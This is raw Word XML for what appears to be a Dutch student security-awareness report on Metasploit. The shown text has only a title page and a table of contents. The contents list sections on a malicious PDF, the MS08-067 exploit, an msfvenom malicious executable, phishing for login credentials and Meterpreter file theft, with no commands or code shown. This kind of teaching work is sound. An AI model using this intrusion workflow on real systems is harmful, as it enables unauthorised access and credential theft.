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4C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0" w:rsidP="00D914C0">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F0FC5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0" w:rsidP="00D914C0">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0" w:rsidP="00D914C0">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F0FC5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SENSIBILISERING MET METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB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5ADAA07C" wp14:editId="104B9A6E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3733800" cy="3733800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="Afbeelding 1" descr="https://pbs.twimg.com/profile_images/580131056629735424/2ENTk2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580131056629735424/2ENTk2K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14C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D914C0" w:rsidRPr="007F0FC5" w:rsidRDefault="00D914C0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559026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4966" w:rsidRDefault="00654966">
          <w:pPr>
            <w:pStyle w:val="Kopvaninhoudsopgave"/>
            <w:rPr>
              <w:lang w:val="nl-NL"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="00654966" w:rsidRDefault="00654966">
          <w:pPr>
            <w:pStyle w:val="Kopvaninhoudsopgave"/>
            <w:rPr>
              <w:lang w:val="nl-NL"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="00654966" w:rsidRDefault="00654966">
          <w:pPr>
            <w:pStyle w:val="Kopvaninhoudsopgave"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="nl-NL"/>
            </w:rPr>
            <w:t>Inhoud</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="0065496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110963" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Projectbeschrijving</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110963 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110964" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Voorbereiding</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110964 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110965" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testomgeving met virtuele machines</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110965 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110966" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Raspberry Pi bestuursysteem en Metasploit installatie</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110966 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110967" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mailerscript</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110967 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110968" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploits</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110968 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110969" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Malicious PDF</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110969 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110970" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MS08-067</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110970 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110971" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Msfvenom malicious exe</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110971 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110972" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Phising: </w:t>
            </w:r>
            <w:r w:rsidR="003B0FCE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>log-in gegevens</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110972 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110973" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Meterpreter sessie</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110973 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110974" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bewegen door folders</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110974 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110975" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Download bestanden</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110975 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110976" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Start programma’s</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110976 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009F2B82" w:rsidRDefault="00EA408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40110977" w:history="1">
            <w:r w:rsidR="009F2B82" w:rsidRPr="00143627">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Zoek specifieke bestanden bij naam</w:t>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc440110977 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F2B82">
              <w:rPr>
                <w:noProof/>
